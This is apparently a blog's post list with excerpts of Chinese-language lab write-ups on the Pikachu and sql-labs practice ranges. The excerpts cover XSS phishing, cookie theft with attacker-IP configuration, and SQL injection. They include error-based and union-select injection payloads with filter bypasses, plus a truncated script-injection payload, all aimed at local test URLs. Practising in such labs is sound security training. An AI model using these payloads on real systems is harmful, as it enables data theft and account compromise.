- 博客(5)
- 收藏
- 关注
原创 Pikachu 靶场钓鱼攻击
找到配置文件修改为自己后台管理的 IP 地址注意箭头前有空格记得删除。插入 Payload:'"><script src="打开黑客发送的网址会弹出输入账号密码。已经成功获取到账户密码了。
2024-10-09 14:15:58
348
原创 Pikachu 靶场盗取 Cookie
注:如果在实际攻击中并不是在受害者端插入 Payload,而是在黑客端插入 Payload 后将网页发送给受害者,让受害者进行访问,这里只是实验。注:在实际攻击中将此 IP 地址修改为黑客端 IP 地址即可(因为我们要诱骗用户访问我们的网页)将配置文件重定向为被害者的 IP 地址(这样设置后会让受害者点击网页时重定向到指定网页)将 Pikachu 文件下的pkxss 复制到 WWW 目录下,确保后台管理安装成功。这里在受害者端搭建了 Pikachu。成功登录后台管理工具。
2024-10-09 13:48:35
317
原创 Sql-labs 靶场(46-53)
目录第 46 关第 47 关第 48 关第 49 关第 50-53 关本关使用的是 order by 排序不同于where后面的注入,它不可以使用union联合查询注入,但可以用盲注、时间、报错等函数进行注入① 判断闭合符不管输入字符型什么闭合符都报错,然后使用数值 1=1、1=2 都不报错 进一步判断② 判断数据库在进行获取数据库时分别使用了字符型和数字型最后发现是数字型http://127.0.0.1/sql/Less-46/?sort=1 and updatexml(1,concat(2,(selec
2024-09-24 17:23:59
620
原创 Sql-labs 靶场(20-30)
语法:http://127.0.0.1/sql/Less-26/?id=0')%a0UniOn%a0SeleCt%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'%a0or('语法:http://127.0.0.1/sql/Less-27/?
2024-09-24 07:41:07
692
原创 Pikachu靶场-SQL注入
语法:User-Agent: 1' and updatexml(1,concat(2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu')),3) or ' 1=1。
2024-09-20 14:54:46
2143
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅